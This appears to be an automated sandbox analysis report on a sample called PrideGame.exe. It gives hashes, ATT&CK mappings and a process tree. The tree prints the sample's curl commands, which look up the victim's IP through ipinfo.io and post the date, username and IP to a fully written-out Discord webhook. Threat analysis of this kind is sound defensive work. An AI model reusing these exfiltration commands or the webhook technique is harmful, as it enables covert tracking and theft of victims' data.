d4e4aeecfabc4bc6c74fd5d0398535416e210a3155f90b685c63eb822fe43548

Resubmissions

14/09/2024, 13:01

240914-p8648svhjd 6

14/09/2024, 13:00

240914-p81x8avdnj 6

14/09/2024, 12:59

240914-p8bnbsvgmf 6

14/09/2024, 12:58

240914-p7g4qavgja 6

Analysis

max time kernel
53s
max time network
54s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
14/09/2024, 12:59

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

PrideGame.exe
Size

89KB
MD5

4671b8f60c1083939ce0d96e15f5692e
SHA1

d64493419d767eff73a7ed497126589f5422e409
SHA256

d4e4aeecfabc4bc6c74fd5d0398535416e210a3155f90b685c63eb822fe43548
SHA512

a43f3adac192c8963995fa685e9b0fc752e7a58fa2d469aad103a83307151de4760667e3cf44b790763b1c0a80fe101dab3bbe005402769341d87fcc4f4d2729
SSDEEP

1536:r7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfow9OK:n7DhdC6kzWypvaQ0FxyNTBfoq

Score

6^/10

discovery

Malware Config

Signatures

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
14	discord.com
15	discord.com
51	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	ipinfo.io
49	ipinfo.io

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrideGame.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrideGame.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 4196 wrote to memory of 4840	4196	PrideGame.exe	92
PID 4196 wrote to memory of 4840	4196	PrideGame.exe	92
PID 4840 wrote to memory of 5000	4840	cmd.exe	93
PID 4840 wrote to memory of 5000	4840	cmd.exe	93
PID 5000 wrote to memory of 2976	5000	cmd.exe	94
PID 5000 wrote to memory of 2976	5000	cmd.exe	94
PID 4840 wrote to memory of 2228	4840	cmd.exe	98
PID 4840 wrote to memory of 2228	4840	cmd.exe	98
PID 4624 wrote to memory of 244	4624	PrideGame.exe	115
PID 4624 wrote to memory of 244	4624	PrideGame.exe	115
PID 244 wrote to memory of 3700	244	cmd.exe	116
PID 244 wrote to memory of 3700	244	cmd.exe	116
PID 3700 wrote to memory of 1360	3700	cmd.exe	117
PID 3700 wrote to memory of 1360	3700	cmd.exe	117
PID 244 wrote to memory of 1860	244	cmd.exe	118
PID 244 wrote to memory of 1860	244	cmd.exe	118

C:\Users\Admin\AppData\Local\Temp\PrideGame.exe
"C:\Users\Admin\AppData\Local\Temp\PrideGame.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4196
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6C51.tmp\6C52.tmp\6C53.bat C:\Users\Admin\AppData\Local\Temp\PrideGame.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl ipinfo.io/ip -s
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5000
  - - C:\Windows\system32\curl.exe
      curl ipinfo.io/ip -s
      4⤵
      PID:2976
- - C:\Windows\system32\curl.exe
    curl -H "Content-Type: application/json" -d "{\"content\":\"```Date: Sat 09/14/2024 | Name: Admin | IP: 194.110.13.70```\"}" -X POST https://discord.com/api/webhooks/1284478912146968618/yUtN3ohxs51acrTk94Xi1HyrcvFN_TAhIP2gvjGEZpCxJ_wbnqsrJg8Mb5FtVUOvlIQS
    3⤵
    PID:2228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4152,i,3387628439405076340,17957358341235678872,262144 --variations-seed-version --mojo-platform-channel-handle=1892 /prefetch:8
1⤵
PID:3800

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3220

C:\Users\Admin\Desktop\PrideGame.exe
"C:\Users\Admin\Desktop\PrideGame.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4624
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FA97.tmp\FA98.tmp\FA99.bat C:\Users\Admin\Desktop\PrideGame.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl ipinfo.io/ip -s
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3700
  - - C:\Windows\system32\curl.exe
      curl ipinfo.io/ip -s
      4⤵
      PID:1360
- - C:\Windows\system32\curl.exe
    curl -H "Content-Type: application/json" -d "{\"content\":\"```Date: Sat 09/14/2024 | Name: Admin | IP: 194.110.13.70```\"}" -X POST https://discord.com/api/webhooks/1284478912146968618/yUtN3ohxs51acrTk94Xi1HyrcvFN_TAhIP2gvjGEZpCxJ_wbnqsrJg8Mb5FtVUOvlIQS
    3⤵
    PID:1860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6C51.tmp\6C52.tmp\6C53.bat

Filesize
508B

MD5
6ee4ef3ea9d924af24dccff91a17614a

SHA1
ddf978f156bac1d78d2cb0a9b4a47d9872c83a00

SHA256
1673dff0bedb835769d1ef90488d82e3e274ffc61ba8abc117d52a91712c329b

SHA512
349563c5503c5a3f7e1444d40faf93ba91ca81d13f834c0c1edb10009b5eb573aaf8effc93f897d49de6b686d67c26bc77c6c298e4bad26c27117352d86769e1

Download Submit